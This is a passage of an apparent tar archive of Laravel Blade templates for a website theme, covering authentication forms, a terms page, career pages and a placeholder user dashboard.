acceptance button in this email to accept the team invitation:') }} @component('mail::button', ['url' => route('register')]) {{ __('Create Account') }} @endcomponent {{ __('If you already have an account, you may accept this invitation by clicking the button below:') }} @else {{ __('You may accept this invitation by clicking the button below:') }} @endif @component('mail::button', ['url' => $acceptUrl]) {{ __('Accept Invitation') }} @endcomponent {{ __('If you did not expect to receive an invitation to this team, you may discard this email.') }} @endcomponent �������������������������������������������������������������������������������������������������������views/terms.blade.php�������������������������������������������������������������������������������0000644�����������������00000000640�14765366572�0010637 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<x-guest-layout> <div class="pt-4 bg-gray-100"> <div class="min-h-screen flex flex-col items-center pt-6 sm:pt-0"> <div> <x-authentication-card-logo /> </div> <div class="w-full sm:max-w-2xl mt-6 p-6 bg-white shadow-md overflow-hidden sm:rounded-lg prose"> {!! $terms !!} </div> </div> </div> </x-guest-layout> ������������������������������������������������������������������������������������������������views/auth/register.blade.php�����������������������������������������������������������������������0000644�����������������00000005757�14765366572�0012310 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<x-guest-layout> <x-authentication-card> <x-slot name="logo"> <x-authentication-card-logo /> </x-slot> <x-validation-errors class="mb-4" /> <form method="POST" action="{{ route('register') }}"> @csrf <div> <x-label for="name" value="{{ __('Name') }}" /> <x-input id="name" class="block mt-1 w-full" type="text" name="name" :value="old('name')" required autofocus autocomplete="name" /> </div> <div class="mt-4"> <x-label for="email" value="{{ __('Email') }}" /> <x-input id="email" class="block mt-1 w-full" type="email" name="email" :value="old('email')" required autocomplete="username" /> </div> <div class="mt-4"> <x-label for="password" value="{{ __('Password') }}" /> <x-input id="password" class="block mt-1 w-full" type="password" name="password" required autocomplete="new-password" /> </div> <div class="mt-4"> <x-label for="password_confirmation" value="{{ __('Confirm Password') }}" /> <x-input id="password_confirmation" class="block mt-1 w-full" type="password" name="password_confirmation" required autocomplete="new-password" /> </div> @if (Laravel\Jetstream\Jetstream::hasTermsAndPrivacyPolicyFeature()) <div class="mt-4"> <x-label for="terms"> <div class="flex items-center"> <x-checkbox name="terms" id="terms" required /> <div class="ml-2"> {!! __('I agree to the :terms_of_service and :privacy_policy', [ 'terms_of_service' => '<a target="_blank" href="'.route('terms.show').'" class="underline text-sm text-gray-600 hover:text-gray-900 rounded-md focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-indigo-500">'.__('Terms of Service').'</a>', 'privacy_policy' => '<a target="_blank" href="'.route('policy.show').'" class="underline text-sm text-gray-600 hover:text-gray-900 rounded-md focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-indigo-500">'.__('Privacy Policy').'</a>', ]) !!} </div> </div> </x-label> </div> @endif <div class="flex items-center justify-end mt-4"> <a class="underline text-sm text-gray-600 hover:text-gray-900 rounded-md focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-indigo-500" href="{{ route('login') }}"> {{ __('Already registered?') }} </a> <x-button class="ml-4"> {{ __('Register') }} </x-button> </div> </form> </x-authentication-card> </x-guest-layout> �����������������views/auth/reset-password.blade.php�����������������������������������������������������������������0000644�����������������00000002664�14765366572�0013440 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<x-guest-layout> <x-authentication-card> <x-slot name="logo"> <x-authentication-card-logo /> </x-slot> <x-validation-errors class="mb-4" /> <form method="POST" action="{{ route('password.update') }}"> @csrf <input type="hidden" name="token" value="{{ $request->route('token') }}"> <div class="block"> <x-label for="email" value="{{ __('Email') }}" /> <x-input id="email" class="block mt-1 w-full" type="email" name="email" :value="old('email', $request->email)" required autofocus autocomplete="username" /> </div> <div class="mt-4"> <x-label for="password" value="{{ __('Password') }}" /> <x-input id="password" class="block mt-1 w-full" type="password" name="password" required autocomplete="new-password" /> </div> <div class="mt-4"> <x-label for="password_confirmation" value="{{ __('Confirm Password') }}" /> <x-input id="password_confirmation" class="block mt-1 w-full" type="password" name="password_confirmation" required autocomplete="new-password" /> </div> <div class="flex items-center justify-end mt-4"> <x-button> {{ __('Reset Password') }} </x-button> </div> </form> </x-authentication-card> </x-guest-layout> ����������������������������������������������������������������������������views/auth/confirm-password.blade.php���������������������������������������������������������������0000644�����������������00000001665�14765366572�0013753 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<x-guest-layout> <x-authentication-card> <x-slot name="logo"> <x-authentication-card-logo /> </x-slot> <div class="mb-4 text-sm text-gray-600"> {{ __('This is a secure area of the application. Please confirm your password before continuing.') }} </div> <x-validation-errors class="mb-4" /> <form method="POST" action="{{ route('password.confirm') }}"> @csrf <div> <x-label for="password" value="{{ __('Password') }}" /> <x-input id="password" class="block mt-1 w-full" type="password" name="password" required autocomplete="current-password" autofocus /> </div> <div class="flex justify-end mt-4"> <x-button class="ml-4"> {{ __('Confirm') }} </x-button> </div> </form> </x-authentication-card> </x-guest-layout> ���������������������������������������������������������������������������views/auth/forgot-password.blade.php����������������������������������������������������������������0000644�����������������00000002300�14765366572�0013601 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<x-guest-layout> <x-authentication-card> <x-slot name="logo"> <x-authentication-card-logo /> </x-slot> <div class="mb-4 text-sm text-gray-600"> {{ __('Forgot your password? No problem. Just let us know your email address and we will email you a password reset link that will allow you to choose a new one.') }} </div> @if (session('status')) <div class="mb-4 font-medium text-sm text-green-600"> {{ session('status') }} </div> @endif <x-validation-errors class="mb-4" /> <form method="POST" action="{{ route('password.email') }}"> @csrf <div class="block"> <x-label for="email" value="{{ __('Email') }}" /> <x-input id="email" class="block mt-1 w-full" type="email" name="email" :value="old('email')" required autofocus autocomplete="username" /> </div> <div class="flex items-center justify-end mt-4"> <x-button> {{ __('Email Password Reset Link') }} </x-button> </div> </form> </x-authentication-card> </x-guest-layout> ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/auth/login.blade.php��������������������������������������������������������������������������0000644�����������������00000003535�14765366572�0011564 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<x-guest-layout> <x-authentication-card> <x-slot name="logo"> <x-authentication-card-logo /> </x-slot> <x-validation-errors class="mb-4" /> @if (session('status')) <div class="mb-4 font-medium text-sm text-green-600"> {{ session('status') }} </div> @endif <form method="POST" action="{{ route('login') }}"> @csrf <div> <x-label for="email" value="{{ __('Email') }}" /> <x-input id="email" class="block mt-1 w-full" type="email" name="email" :value="old('email')" required autofocus autocomplete="username" /> </div> <div class="mt-4"> <x-label for="password" value="{{ __('Password') }}" /> <x-input id="password" class="block mt-1 w-full" type="password" name="password" required autocomplete="current-password" /> </div> <div class="block mt-4"> <label for="remember_me" class="flex items-center"> <x-checkbox id="remember_me" name="remember" /> <span class="ml-2 text-sm text-gray-600">{{ __('Remember me') }}</span> </label> </div> <div class="flex items-center justify-end mt-4"> @if (Route::has('password.request')) <a class="underline text-sm text-gray-600 hover:text-gray-900 rounded-md focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-indigo-500" href="{{ route('password.request') }}"> {{ __('Forgot your password?') }} </a> @endif <x-button class="ml-4"> {{ __('Log in') }} </x-button> </div> </form> </x-authentication-card> </x-guest-layout> �������������������������������������������������������������������������������������������������������������������������������������������������������������������views/auth/two-factor-challenge.blade.php�����������������������������������������������������������0000644�����������������00000005171�14765366572�0014457 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<x-guest-layout> <x-authentication-card> <x-slot name="logo"> <x-authentication-card-logo /> </x-slot> <div x-data="{ recovery: false }"> <div class="mb-4 text-sm text-gray-600" x-show="! recovery"> {{ __('Please confirm access to your account by entering the authentication code provided by your authenticator application.') }} </div> <div class="mb-4 text-sm text-gray-600" x-show="recovery"> {{ __('Please confirm access to your account by entering one of your emergency recovery codes.') }} </div> <x-validation-errors class="mb-4" /> <form method="POST" action="{{ route('two-factor.login') }}"> @csrf <div class="mt-4" x-show="! recovery"> <x-label for="code" value="{{ __('Code') }}" /> <x-input id="code" class="block mt-1 w-full" type="text" inputmode="numeric" name="code" autofocus x-ref="code" autocomplete="one-time-code" /> </div> <div class="mt-4" x-show="recovery"> <x-label for="recovery_code" value="{{ __('Recovery Code') }}" /> <x-input id="recovery_code" class="block mt-1 w-full" type="text" name="recovery_code" x-ref="recovery_code" autocomplete="one-time-code" /> </div> <div class="flex items-center justify-end mt-4"> <button type="button" class="text-sm text-gray-600 hover:text-gray-900 underline cursor-pointer" x-show="! recovery" x-on:click=" recovery = true; $nextTick(() => { $refs.recovery_code.focus() }) "> {{ __('Use a recovery code') }} </button> <button type="button" class="text-sm text-gray-600 hover:text-gray-900 underline cursor-pointer" x-show="recovery" x-on:click=" recovery = false; $nextTick(() => { $refs.code.focus() }) "> {{ __('Use an authentication code') }} </button> <x-button class="ml-4"> {{ __('Log in') }} </x-button> </div> </form> </div> </x-authentication-card> </x-guest-layout> �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/auth/verify-email.blade.php�������������������������������������������������������������������0000644�����������������00000003475�14765366572�0013050 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<x-guest-layout> <x-authentication-card> <x-slot name="logo"> <x-authentication-card-logo /> </x-slot> <div class="mb-4 text-sm text-gray-600"> {{ __('Before continuing, could you verify your email address by clicking on the link we just emailed to you? If you didn\'t receive the email, we will gladly send you another.') }} </div> @if (session('status') == 'verification-link-sent') <div class="mb-4 font-medium text-sm text-green-600"> {{ __('A new verification link has been sent to the email address you provided in your profile settings.') }} </div> @endif <div class="mt-4 flex items-center justify-between"> <form method="POST" action="{{ route('verification.send') }}"> @csrf <div> <x-button type="submit"> {{ __('Resend Verification Email') }} </x-button> </div> </form> <div> <a href="{{ route('profile.show') }}" class="underline text-sm text-gray-600 hover:text-gray-900 rounded-md focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-indigo-500" > {{ __('Edit Profile') }}</a> <form method="POST" action="{{ route('logout') }}" class="inline"> @csrf <button type="submit" class="underline text-sm text-gray-600 hover:text-gray-900 rounded-md focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-indigo-500 ml-2"> {{ __('Log Out') }} </button> </form> </div> </div> </x-authentication-card> </x-guest-layout> ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/career/career-detail.blade.php�������������������������������������������������������0000644�����������������00000027666�14765366572�0015307 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<!--// Career Section Start //--> <section class="section"> <div class="container"> <div class="row"> <div class="col-lg-8 col-md-12 mx-auto"> @if(Auth::user()) @can('career check') <div class="easier-mode"> @if(Auth::user()) @can('career check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif <div class="easier-section-area"> @endcan @endif @isset ($career_content) <div class="services-detail-top"> @if (!empty($career_content->section_image)) <img src="{{ asset('uploads/img/career/'.$career_content->section_image) }}" alt="Services image" class="img-fluid"> @endif @if ($career->type == 'image') @if (!empty($career->section_image)) <span> <img src="{{ asset('uploads/img/career/'.$career->section_image) }}" alt="career image" class="img-fluid"> </span> @endif @else <span class="{{ $career->icon }}"></span> @endif </div> <div class="services-detail-inner"> <p>@php echo html_entity_decode($career_content->description); @endphp</p> </div> @else <div class="services-detail-top"> <img src="{{ asset('uploads/img/dummy/800x600.jpg') }}" alt="Services image" class="img-fluid"> <span class="fa fa-tablet"></span> </div> <div class="services-detail-inner"> <h2>We accelerated our web design and development process</h2> <p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. </p> <p> There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form, by injected humour, or randomised words which don't look even slightly believable. If you are going to use a passage of Lorem Ipsum, you need to be sure there isn't anything embarrassing </p> </div> @endisset @if(Auth::user()) @can('career check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="career-content.create"> <input type="hidden" name="style" value="{{ $career->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_career_content') }} </button> </form> </div> </div> @endcan @endif </div> </div> </div> </section> <!--// Career Section End //--> @if(Auth::user()) @can('career check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <!--// Contact Section Start //--> <section class="section bg-primary-light" id="contact"> <div class="container"> @if(Auth::user()) @can('career check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif @isset ($career_section_style1) <div class="row"> <div class="col-lg-6"> <div class="contact-info-item"> <div class="icon border-0"> <span class="fa fa-building"></span> </div> <div class="body"> <h5>@php echo html_entity_decode($career_section_style1->company_title); @endphp</h5> <p>@php echo html_entity_decode($career_section_style1->company_description); @endphp</p> </div> </div> </div> <div class="col-lg-6"> <div class="contact-info-item"> <div class="icon border-0"> <span class="fas fa-envelope-open-text"></span> </div> <div class="body"> <h5>{{ $career_section_style1->company_contact_title }}</h5> <p> <a class="custom-color-light-black" href="mailto:{{ $career_section_style1->email }}">{{ $career_section_style1->email }}</a> </p> <p> <a class="custom-color-light-black" href="tel:{{ $career_section_style1->phone }}">{{ $career_section_style1->phone }}</a> </p> <p>{{ $career_section_style1->address }}</p> </div> </div> </div> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="row"> <div class="col-lg-6"> <div class="contact-info-item"> <div class="icon border-0"> <span class="fa fa-building"></span> </div> <div class="body"> <h5>About Company</h5> <p> We have been serving you since 2000. We are here for the best version of digital. Contact us now to build a career with us. </p> </div> </div> </div> <div class="col-lg-6"> <div class="contact-info-item"> <div class="icon border-0"> <span class="fas fa-envelope-open-text"></span> </div> <div class="body"> <h5>E-Mail Phone:</h5> <p> <a class="custom-color-light-black" href="mailto:elsecolor@gmail.com">elsecolor@gmail.com</a> </p> <p> <a class="custom-color-light-black" href="tel:+1 422-200-5555">+1 422-200-5555</a> </p> <p>1395 Nixon Avenue Etowah, TN 37331</p> </div> </div> </div> </div> @endif @endisset </div> </section> <!--// Contact Section End //--> @if(Auth::user()) @can('career check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="career.index"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_section_title_description') }} </button> </form> </div> </div> @endcan @endif ��������������������������������������������������������������������������views/frontend/career/show.blade.php����������������������������������������������������������������0000644�����������������00000025335�14765366572�0013555 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<!DOCTYPE html> <html dir="@if (session()->has('language_direction_from_dropdown')) @if(session()->get('language_direction_from_dropdown') == 1) {{ __('rtl') }} @else {{ __('ltr') }} @endif @else {{ __('ltr') }} @endif" lang="@if (session()->has('language_code_from_dropdown')){{ str_replace('_', '-', session()->get('language_code_from_dropdown')) }}@else{{ str_replace('_', '-', $language->language_code) }}@endif"> <head> <!-- Meta Tags --> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"> <meta name="title" content="@if (!empty($career->title)) {{ $career->title }} @elseif (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)){{ $seo->meta_title }} @endif"> <meta name="description" content="@if (!empty($career_content->meta_description)) {{ $career_content->meta_description }} @elseif (!empty($page_builder->meta_description)) {{ $page_builder->meta_description }} @elseif (isset($seo)){{ $seo->meta_description }} @endif"> <meta name="keywords" content="@if (!empty($career_content->meta_keyword)) {{ $career_content->meta_keyword }} @elseif (!empty($page_builder->meta_keyword)) {{ $page_builder->meta_keyword }} @elseif (isset($seo)){{ $seo->meta_keyword }} @endif"> <meta name="author" content="elsecolor"> <meta property="fb:app_id" content="@if (isset($seo)){{ $seo->fb_app_id }} @endif"> <meta property="og:title" content="@if (!empty($career->title)) {{ $career->title }} @elseif (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)){{ $seo->meta_title }} @endif"> <meta property="og:url" content="@if (isset($seo) || isset($page_builder)){{ url()->current() }} @endif"> <meta property="og:description" content="@if (!empty($career_content->meta_description)) {{ $career_content->meta_description }} @elseif (!empty($page_builder->meta_description)) {{ $page_builder->meta_description }} @elseif (isset($seo)){{ $seo->meta_description }} @endif"> <meta property="og:image" content="@if (!empty($favicon->favicon_image)){{ asset('uploads/img/general/'.$favicon->favicon_image) }} @endif"> <meta itemprop="image" content="@if (!empty($favicon->favicon_image)){{ asset('uploads/img/general/'.$favicon->favicon_image) }} @endif"> <meta property="og:type" content="website"> <meta name="twitter:card" content="summary_large_image"> <meta name="twitter:image" content="@if (!empty($favicon->favicon_image)){{ asset('uploads/img/general/'.$favicon->favicon_image) }} @endif"> <meta property="twitter:title" content="@if (!empty($career->title)) {{ $career->title }} @elseif (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)){{ $seo->meta_title }} @endif"> <meta property="twitter:description" content="@if (!empty($career_content->meta_description)) {{ $career_content->meta_description }} @elseif (!empty($page_builder->meta_description)) {{ $page_builder->meta_description }} @elseif (isset($seo)){{ $seo->meta_description }} @endif"> <!-- CSRF Token --> <meta name="csrf-token" content="{{ csrf_token() }}"> <!-- Title --> <title>@if (!empty($career->title)) {{ $career->title }} @elseif (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)) {{ $seo->meta_title }} @endif</title> @if (!empty($favicon->favicon_image)) <!-- Favicon --> <link href="{{ asset('uploads/img/general/'.$favicon->favicon_image) }}" sizes="128x128" rel="shortcut icon" type="image/x-icon" /> <link href="{{ asset('uploads/img/general/'.$favicon->favicon_image) }}" sizes="128x128" rel="shortcut icon" /> @else <!-- Favicon --> <link href="{{ asset('uploads/img/dummy/favicon.png') }}" sizes="128x128" rel="shortcut icon" type="image/x-icon" /> <link href="{{ asset('uploads/img/dummy/favicon.png') }}" sizes="128x128" rel="shortcut icon" /> @endif <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> @isset ($font) <!-- Google Fonts --> <link href="{{ $font->text_font_link }}" rel="stylesheet"> <link href="{{ $font->title_font_link }}" rel="stylesheet"> @else <!-- Google Fonts --> <link href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,300;0,400;0,500;0,700;0,900;1,300;1,400;1,500;1,700;1,900&display=swap" rel="stylesheet"> <link href="https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,300;1,400;1,500;1,600;1,700;1,800&display=swap" rel="stylesheet"> @endisset <!--// Boostrap v5 //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/bootstrap.min.css') }}"> <!--// Magnific Popup //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/magnific.popup.min.css') }}"> <!--// Animate Css //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/animate.min.css') }}"> <!--// Vegas Slider Css //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/vegas.slider.min.css') }}"> <!--// Owl Carousel //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/owl.carousel.min.css') }}"> <!--// Owl Carousel Default //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/owl.carousel.default.min.css') }}"> <!--// Font Awesome //--> <link rel="stylesheet" href="{{ asset('assets/frontend/fonts/font_awesome/css/all.css') }}"> <!--// Flat Icons //--> <link rel="stylesheet" href="{{ asset('assets/frontend/fonts/flat_icons/flaticon.css') }}"> <style> :root { @isset ($color_option) @if ($color_option->color_option != 0) --main-color: {{ $color_option->main_color }}; --secondary-color: {{ $color_option->secondary_color }}; --scroll-button-color: {{ $color_option->scroll_button_color }}; --bottom-button-color: {{ $color_option->bottom_button_color }}; --bottom-button-hover-color: {{ $color_option->bottom_button_hover_color }}; --side-button-color: {{ $color_option->side_button_color }}; @else --main-color: #ff4500; --secondary-color: #171718; --scroll-button-color: #00baa3; --bottom-button-color: #212529; --bottom-button-hover-color: #333; --side-button-color: #25d366; @endif @else --main-color: #ff4500; --secondary-color: #171718; --scroll-button-color: #00baa3; --bottom-button-color: #212529; --bottom-button-hover-color: #333; --side-button-color: #25d366; @endisset @isset ($font) --title-font:@php echo html_entity_decode($font->title_font_family); @endphp; --text-font: @php echo html_entity_decode($font->text_font_family); @endphp; @else --title-font: 'Poppins', sans-serif; --text-font: 'Roboto', sans-serif; @endisset } </style> <!--// Theme Main Css //--> <link rel="stylesheet" href="{{ asset('assets/frontend/css/style.css') }}"> <!--// Theme Color Css //--> <!-- helper style css file --> <link rel="stylesheet" href="{{ asset('assets/frontend/css/helper-style.css') }}"> <style> #counters { background-image: url({{ asset('uploads/img/dummy/bg/counter-bg.png') }}); } </style> @if (isset($google_analytic)) <!-- Google tag (gtag.js) --> <script async src="https://www.googletagmanager.com/gtag/js?id={{ $google_analytic->google_analytic }}"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', '{{ $google_analytic->google_analytic }}'); </script> @endif @livewireStyles </head> <body data-bs-spy="scroll" data-bs-target="#fixedNavbar" @if (session()->has('language_direction_from_dropdown')) @if(session()->get('language_direction_from_dropdown') == 1) class="rtl-mode" @endif @elseif (isset($language)) @if ($language->direction == 1) class="rtl-mode" @endif @endif > <!--// Page Wrapper Start //--> <div class="page-wrapper" id="wrapper"> @include('frontend.sections.header.header-style1') <!--// Main Area Start //--> <main class="main-area"> @include('frontend.sections.breadcrumb.breadcrumb-style1') @include('frontend.career.career-detail') @include('frontend.sections.footer.footer-style1') </main> <!--// Main Area End //--> <a href="#" class="scroll-top-btn" data-scroll-goto="1"> <i class="fa fa-arrow-up"></i> </a> <!--// .scroll-top-btn // --> @include('frontend.sections.preloader.preloader') </div> <!--// Page Wrapper End //--> @include('frontend.sections.widget.bottom-style1') @include('frontend.sections.widget.side-style1') <!--// JQuery //--> <script src="{{ asset('assets/frontend/vendor/js/jquery.min.js') }}"></script> <!--// Bootstrap //--> <script src="{{ asset('assets/frontend/vendor/js/bootstrap.min.js') }}"></script> <!--// Images Loaded Js //--> <script src="{{ asset('assets/frontend/vendor/js/images.loaded.min.js') }}"></script> <!--// Wow Js //--> <script src="{{ asset('assets/frontend/vendor/js/wow.min.js') }}"></script> <!--// Magnific Popup //--> <script src="{{ asset('assets/frontend/vendor/js/magnific.popup.min.js') }}"></script> <!--// Waypoint Js //--> <script src="{{ asset('assets/frontend/vendor/js/waypoint.min.js') }}"></script> <!--// Counter Up Js //--> <script src="{{ asset('assets/frontend/vendor/js/counter.up.min.js') }}"></script> <!--// JQuery Easing Functions //--> <script src="{{ asset('assets/frontend/vendor/js/jquery.easing.min.js') }}"></script> <!--// Owl Carousel //--> <script src="{{ asset('assets/frontend/vendor/js/owl.carousel.min.js') }}"></script> <!--// Form Validate //--> <script src="{{ asset('assets/frontend/vendor/js/validate.min.js') }}"></script> <!--// Form Validate //--> <script src="{{ asset('assets/frontend/vendor/js/custom.select.plugin.js') }}"></script> <!--// Scroll It //--> <script src="{{ asset('assets/frontend/vendor/js/scrollit.min.js') }}"></script> <!--// Isotope Js //--> <script src="{{ asset('assets/frontend/vendor/js/isotope.min.js') }}"></script> <!--// Main Js //--> <script src="{{ asset('assets/frontend/js/main.js') }}"></script> @isset ($tawk_to) <script> @php echo html_entity_decode($tawk_to->tawk_to); @endphp </script> @endisset @livewireScripts </body> </html> ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/profile/index.blade.php��������������������������������������������������������������0000644�����������������00000036710�14765366572�0014102 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.frontend.master') @section('content') <!-- ============================ Page Title Start================================== --> <div class="page-title" style="background:#f4f4f4 @if (isset($breadcrumb)) url({{ asset('uploads/img/general/'.$breadcrumb->breadcrumb_image) }}); @else url({{ asset('uploads/img/dummy/1920x750.jpg') }}); @endif" data-overlay="5"> <div class="container"> <div class="row"> <div class="col-lg-12 col-md-12"> <div class="breadcrumbs-wrap"> <ol class="breadcrumb"> <li class="breadcrumb-item active" aria-current="page">Dashboard</li> </ol> <h2 class="breadcrumb-title">Hello {{ Auth::user()->name }}, Welcome</h2> </div> </div> </div> </div> </div> <!-- ============================ Page Title End ================================== --> <!-- ============================ User Dashboard ================================== --> <section class="gray pt-5 pb-5"> <div class="container-fluid"> <div class="row"> <div class="col-lg-3 col-md-4"> <div class="property_dashboard_navbar"> <div class="dash_user_avater"> @if (!empty($user->profile_photo_path)) <img src="{{ asset('uploads/img/profile/'.$user->profile_photo_path) }}" class="img-fluid avater" alt="profile image"> @else <img src="{{ asset('uploads/img/dummy/100x100.jpg') }}" class="img-fluid avater" alt="profile image"> @endif <h4>{{ Auth::user()->name }}</h4> </div> <div class="dash_user_menues"> <ul> <li class="active"><a href="dashboard.html"><i class="fa fa-tachometer-alt"></i>Dashboard<span class="notti_coun style-1">4</span></a></li> <li><a href="{{ route('profile-page.edit') }}"><i class="fa fa-user-tie"></i>My Profile</a></li> <li><a href="bookmark-list.html"><i class="fa fa-bookmark"></i>Saved Property<span class="notti_coun style-2">7</span></a></li> <li><a href="my-property.html"><i class="fa fa-tasks"></i>My Properties</a></li> <li><a href="messages.html"><i class="fa fa-envelope"></i>Messages<span class="notti_coun style-3">3</span></a></li> <li><a href="choose-package.html"><i class="fa fa-gift"></i>Choose Package<span class="expiration">10 days left</span></a></li> <li><a href="submit-property-dashboard.html"><i class="fa fa-pen-nib"></i>Submit New Property</a></li> <li><a href="change-password.html"><i class="fa fa-unlock-alt"></i>Change Password</a></li> </ul> </div> <div class="dash_user_footer"> <ul> <li> <a href="{{ route('logout') }}" onclick="event.preventDefault(); document.getElementById('logout-form').submit();"> <i class="fa fa-power-off"></i> </a> <form id="logout-form" action="{{ route('logout') }}" method="POST" style="display: none;"> @csrf </form> </li> <li><a href="#"><i class="fa fa-comment"></i></a></li> <li><a href="#"><i class="fa fa-cog"></i></a></li> </ul> </div> </div> </div> <div class="col-lg-9 col-md-8"> <div class="dashboard-body"> <div class="row"> <div class="col-lg-12 col-md-12 col-sm-12"> <h4>Your Current Package: <span class="pc-title theme-cl">Gold Package</span></h4> </div> </div> <div class="row"> <div class="col-lg-4 col-md-6 col-sm-12"> <div class="dashboard_stats_wrap widget-1"> <div class="dashboard_stats_wrap_content"><h4>607</h4> <span>Listed Property</span></div> <div class="dashboard_stats_wrap-icon"><i class="ti-location-pin"></i></div> </div> </div> <div class="col-lg-4 col-md-6 col-sm-12"> <div class="dashboard_stats_wrap widget-3"> <div class="dashboard_stats_wrap_content"><h4>$10,540</h4> <span>Earned This Week</span></div> <div class="dashboard_stats_wrap-icon"><i class="ti-wallet"></i></div> </div> </div> <div class="col-lg-4 col-md-6 col-sm-12"> <div class="dashboard_stats_wrap widget-2"> <div class="dashboard_stats_wrap_content"><h4>5,40580</h4> <span>Earned This Month</span></div> <div class="dashboard_stats_wrap-icon"><i class="ti-credit-card"></i></div> </div> </div> </div> <!-- row --> <div class="row"> <div class="col-lg-8 col-md-7 col-sm-12"> <div class="card"> <div class="card-header"> <h4 class="mb-0">Extra Area Chart</h4> </div> <div class="card-body"> <ul class="list-inline text-center m-t-40"> <li> <h5><i class="fa fa-circle m-r-5 text-warning"></i>Website A</h5> </li> <li> <h5><i class="fa fa-circle m-r-5 text-danger"></i>Website B</h5> </li> <li> <h5><i class="fa fa-circle m-r-5 text-success"></i>Website C</h5> </li> </ul> <div class="chart" id="extra-area-chart" style="height: 300px;"></div> </div> </div> </div> <div class="col-lg-4 col-md-5 col-sm-12"> <div class="card"> <div class="card-header"> <h6>Notifications</h6> </div> <div class="ground-list ground-list-hove"> <div class="ground ground-single-list"> <a href="#"> <div class="btn-circle-40 theme-cl theme-bg-light"><i class="ti-home"></i></div> </a> <div class="ground-content"> <h6><a href="#">Your listing <strong>Azreal Modern</strong> has been approved!.</a></h6> <span class="small">Just Now</span> </div> </div> <div class="ground ground-single-list"> <a href="#"> <div class="btn-circle-40 theme-cl theme-bg-light"><i class="ti-comment-alt"></i></div> </a> <div class="ground-content"> <h6><a href="#">Litha Lynes left a review on <strong>Renovated Apartment</strong></a></h6> <span class="small">20 min ago</span> </div> </div> <div class="ground 